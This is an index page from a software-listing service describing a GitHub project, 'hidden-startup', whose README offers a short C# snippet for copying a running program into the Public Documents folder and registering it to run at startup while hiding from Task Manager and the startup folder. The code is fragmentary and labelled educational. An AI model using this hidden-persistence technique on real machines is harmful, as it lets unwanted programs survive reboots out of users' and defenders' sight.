Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/hyukisback/hidden-startup

It is not showed in the task manager or shell:startup etc..
https://github.com/hyukisback/hidden-startup

Last synced: 12 days ago
JSON representation

It is not showed in the task manager or shell:startup etc..

Awesome Lists containing this project

README

        

# Hidden-Startup
Usage
```C#
string publicDir = Environment.GetEnvironmentVariable("public");
string copyPath = publicDir + @"\Documents\";
FileInfo copyFile = new FileInfo(copyPath);
string OriginPath = Assembly.GetEntryAssembly().Location;
if (!(copyFile.Exists))
{
System.IO.File.Copy(OriginPath, copyPath);
}
RunOnce()
```

For educational